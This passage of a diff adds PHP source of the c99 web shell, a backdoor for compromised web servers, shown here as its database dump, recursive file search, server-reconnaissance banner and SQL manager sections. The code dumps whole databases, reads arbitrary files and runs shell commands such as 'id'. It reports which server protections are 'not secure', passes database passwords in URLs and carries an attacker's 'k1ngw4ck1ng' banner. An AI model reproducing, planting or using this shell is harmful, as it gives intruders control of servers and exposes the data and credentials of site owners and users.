+# Date: ".date("d.m.Y H:i:s")."
+# DB: \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret["err"][] = mysql_smarterror();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row["1"].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+      $values = implode("', '", $values);
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+      $out .= $sql;
+     }
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w");
+  if (!$fp) {$ret["err"][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+  $value = "";
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+  $value .= "'".addslashes($v)."'";
+  if (!empty($functs[$k])) {$value .= ")";}
+  $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+ mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+  if ($tbl_struct)
+  {
+   echo "<td valign=\"top\"><b>Fields:</b><br>";
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "� <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+   echo "</td></tr></table>";
+  }
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if (!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+  "METHOD"=>array(output_type),
+  "METHOD1"...
+  ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
+ */
+ $types = array(
+  "SELECT"=>array(3,1),
+  "SHOW"=>array(2,1),
+  "DELETE"=>array(1),
+  "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+  $result["propertions"] = $types[$op];
+  $result["query"]  = $query;
+  if ($types[$op] == 2)
+  {
+   foreach($arr as $k=>$v)
+   {
+    if (strtoupper($v) == "LIMIT")
+    {
+     $result["limit"] = $arr[$k+1];
+     $result["limit"] = explode(",",$result["limit"]);
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+     unset($arr[$k],$arr[$k+1]);
+    }
+   }
+  }
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== FALSE)
+ {
+  if($f != "." && $f != "..")
+  {
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+   if (is_dir($d.$f))
+   {
+    $search_i_d++;
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+    if (!is_link($d.$f)) {c99fsearch($d.$f);}
+   }
+   else
+   {
+    $search_i_f++;
+    if ($bool)
+    {
+     if (!empty($a["text"]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+      else {$bool = strpos(" ".$r,$a["text"],1);}
+      if ($a["text_not"]) {$bool = !$bool;}
+      if ($bool) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+ global $gzipencode,$ft;
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+ {
+  $v = @ob_get_contents();
+  @ob_end_clean();
+  @ob_start("ob_gzHandler");
+  echo $v;
+  @ob_end_flush();
+ }
+}
+function c99shexit()
+{
+ onphpshutdown();
+ exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", FALSE);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ $tmpdir = ini_get("upload_tmp_dir");
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = TRUE;
+ $hsafemode = "<font color=red>ON (secure)</font>";
+}
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
+$sort = htmlspecialchars($sort);
+if (empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF
+@ini_set("highlight.comment",$highlight_comment); //#FF8000
+@ini_set("highlight.default",$highlight_default); //#0000BB
+@ini_set("highlight.html",$highlight_html); //#000000
+@ini_set("highlight.keyword",$highlight_keyword); //#007700
+@ini_set("highlight.string",$highlight_string); //#DD0000
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?>
+
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title>shell@<?php echo getenv("HTTP_HOST"); ?></title><STYLE>
+TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
+.style1 {
+	color: #FF0000;
+	font-weight: bold;
+}
+.style2 {font-size: -3}
+</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><div align="center"><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"></p>
+  <p><font size="-3"><span class="style2"></br>
+ <font color="#333333">k1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1</font><font color="white">ngw4ck1n</font><font color="#333333">gw4c</font><font color="white">k</font><font color="#333333">1ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck</font><font color="white">1</font><font color="#333333">ngw4ck1ngw4ck1ng</font><font color="white">w4</font><font color="#333333">ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4ck1ngw</font><font color="white">4</font><font color="#333333">ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4c</font><font color="white">k1ng</font><font color="#333333">w4ck1ngw4ck1ngw4ck1ngw4ck1ng</font><br>
+
+      <font color="#333333">w4ck1ngw4c</font><font color="white">k1n</font><font color="#333333">gw4ck</font><font color="white">1ngw4</font><font color="#333333">ck</font><font color="white">1ngw4ck1n</font><font color="#333333">gw</font><font color="white">4ck1n</font><font color="#333333">g</font><font color="white">w</font><font color="#333333">4ck1ngw4ck</font><font color="white">1ngw4</font><font color="#333333">ck</font><font color="white">1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1</font><font color="#333333">ngw4ck</font><font color="white">1n</font><font color="#333333">gw4ck1ngw</font><font color="white">4ck</font><font color="#333333">1ng</font><font color="white">w4ck</font><font color="#333333">1ngw4ck1ngw4ck1ngw4ck1ngw4ck</font><br>
+
+      <font color="#333333">1ngw4ck1ng</font><font color="white">w4ck</font><font color="#333333">1ngw</font><font color="white">4ck1</font><font color="#333333">ngw4</font><font color="white">ck1</font><font color="#333333">ng</font><font color="white">w4c</font><font color="#333333">k1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1</font><font color="#333333">ngw</font><font color="white">4</font><font color="#333333">ck</font><font color="white">1ngw4ck1ng</font><font color="#333333">w</font><font color="white">4ck</font><font color="#333333">1ng</font><font color="white">w4ck1n</font><font color="#333333">gw4ck1ngw</font><font color="white">4ck</font><font color="#333333">1ngw4ck1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1ngw</font><font color="#333333">4ck1n</font><font color="white">gw4ck1ngw4ck</font><font color="#333333">1ngw4ck1ngw</font><br>
+
+      <font color="#333333">4ck1ngw4ck1</font><font color="white">ngw4</font><font color="#333333">ck</font><font color="white">1ngw4</font><font color="#333333">ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw</font><font color="white">4ck1</font><font color="#333333">n</font><font color="white">gw4</font><font color="#333333">ck1</font><font color="white">ngw4ck</font><font color="#333333">1ngw4</font><font color="white">ck</font><font color="#333333">1</font><font color="white">ngw4ck1n</font><font color="#333333">gw4ck1ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck1ngw4</font><font color="white">ck1n</font><font color="#333333">g</font><font color="white">w4ck1ngw4ck</font><font color="#333333">1ngw4c</font><font color="white">k1ngw</font><font color="#333333">4ck1ngw4ck1</font><br>
+
+      <font color="#333333">ngw4ck1ngw4c</font><font color="white">k1ngw4ck1ng</font><font color="#333333">w4</font><font color="white">ck1n</font><font color="#333333">gw4ck1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1ngw4ck1n</font><font color="#333333">gw4ck1n</font><font color="white">gw4ck1ngw4ck</font><font color="#333333">1ngw4ck1ng</font><font color="white">w4ck1</font><font color="#333333">ngw4ck1</font><font color="white">ngw4ck1ngw4ck1ng</font><font color="#333333">w4ck1ng</font><font color="white">w4ck1n</font><font color="#333333">gw4ck1ngw4</font><br>
+
+      <font color="#333333">ck1ngw4ck1ng</font><font color="white">w4ck1ngw</font><font color="#333333">4c</font><font color="white">k1ngw4c</font><font color="#333333">k1ng</font><font color="white">w4ck1ngw4c</font><font color="#333333">k1n</font><font color="white">gw4c</font><font color="#333333">k1ngw4c</font><font color="white">k1ngw4ck1ngw4ck</font><font color="#333333">1ngw4c</font><font color="white">k1</font><font color="#333333">n</font><font color="white">gw4</font><font color="#333333">ck1ngw4</font><font color="white">ck1ngw4ck1ngw4ck1ngw4ck1ngw</font><font color="#333333">4ck1ngw4ck1n</font><br>
+
+      <font color="#333333">gw4ck1ngw4ck1</font><font color="white">ngw4ck</font><font color="#333333">1ngw</font><font color="white">4ck1ng</font><font color="#333333">w4c</font><font color="white">k1ngw</font><font color="#333333">4</font><font color="white">ck1n</font><font color="#333333">gw4c</font><font color="white">k1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1ngw4ck1ngw4ck1</font><font color="#333333">ngw4ck</font><font color="white">1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4</font><font color="#333333">c</font><font color="white">k1ngw4</font><font color="#333333">ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw4</font><font color="white">ck1</font><font color="#333333">ngw4ck1ngw4c</font><br>
+
+      <font color="#333333">k1ngw4ck1ngw4c</font><font color="white">k1ngw</font><font color="#333333">4ck1n</font><font color="white">gw4ck</font><font color="#333333">1ngw4ck1n</font><font color="white">gw4c</font><font color="#333333">k1ngw</font><font color="white">4ck1ngw4ck1n</font><font color="#333333">g</font><font color="white">w4ck1</font><font color="#333333">ngw4</font><font color="white">ck1ngw4ck</font><font color="#333333">1ngw</font><font color="white">4ck</font><font color="#333333">1ngw4c</font><font color="white">k1n</font><font color="#333333">gw</font><font color="white">4ck1</font><font color="#333333">ngw4ck1n</font><font color="white">g</font><font color="#333333">w4ck1n</font><font color="white">gw4c</font><font color="#333333">k1ngw4ck1ng</font><br>
+
+      <font color="#333333">w4ck1ngw4ck1ngw4</font><font color="white">ck1</font><font color="#333333">ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck1ngw4</font><font color="white">ck1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1ngw</font><font color="#333333">4ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw4ck</font><font color="white">1ngw4ck1ngw4c</font><font color="#333333">k1n</font><font color="white">gw4</font><font color="#333333">ck1n</font><font color="white">gw4</font><font color="#333333">ck1ngw4ck1ngw</font><font color="white">4ck1ng</font><font color="#333333">w4ck1ngw4ck</font><br>
+
+      <font color="#333333">1ngw4ck1ngw4ck1ngw4ck1ngw4</font><font color="white">c</font><font color="#333333">k1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1ngw4ck1ngw4ck1ngw4ck1n</font><font color="white">g</font><font color="#333333">w4ck1ngw4c</font><font color="white">k1ngw4</font><font color="#333333">c</font><font color="white">k</font><font color="#333333">1ngw4c</font><font color="white">k1n</font><font color="#333333">gw4c</font><font color="white">k1n</font><font color="#333333">gw4ck1ngw4ck1ngw</font><font color="white">4ck1n</font><font color="#333333">gw4ck1ngw</font><br>
+
+      <font color="#333333">4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ng</font><font color="white">w4</font><font color="#333333">ck1ngw4ck1ngw4ck1n</font><font color="white">gw4ck</font><font color="#333333">1ngw4ck1</font><br>
+      <font color="#333333">ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4ck1ngw4ck1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1ngw4</font></br>
+  </span>&nbsp;</p></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>System Info:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><? echo "<b>Disabled functions</b>: <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} ?><p align="left"><b>We are: <?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?><?php $curl_on = @function_exists('curl_version');
+echo "<br/>cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>")); ?></br><? if(@ini_get("register_globals")){$reg_g="<font color=green>ON</font>";}else{$reg_g="<font color=red>OFF</font>";} echo("<b>Register globals:</b> $reg_g"); ?><?php echo "<br/>MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; }
+echo "</b>";
+echo "<br/>MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?><?php echo "<br/>PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?><?php echo "<br/>Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?> </b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$d = str_replace("\\\\","\\",$d);
+$dispd = htmlspecialchars($d);
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r.DIRECTORY_SEPARATOR;
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = TRUE;
+ $wdt = "<font color=green>[ ok ]</font>";
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = FALSE;
+ $wdt = "<font color=red>[ Read-Only ]</font>";
+ echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === FALSE) {$free = 0;}
+ if ($total === FALSE) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
+
+}
+echo "<br>";
+echo "<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
+   if ($letter.":" != $v) {$letters .= $letter;}
+   else {$letters .= "<font color=green>".$letter."</font>";}
+   $letters .= " ]</a> ";
+  }
+ }
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%sort",$sort,$item[1]);
+  $v = realpath($d."..");
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+echo "</p></td></tr></table><br>";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_smarterror();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+ }
+ else {$sql_sock = FALSE;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"><br/></font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //Start left panel
+  if (!empty($sql_db))
+  {
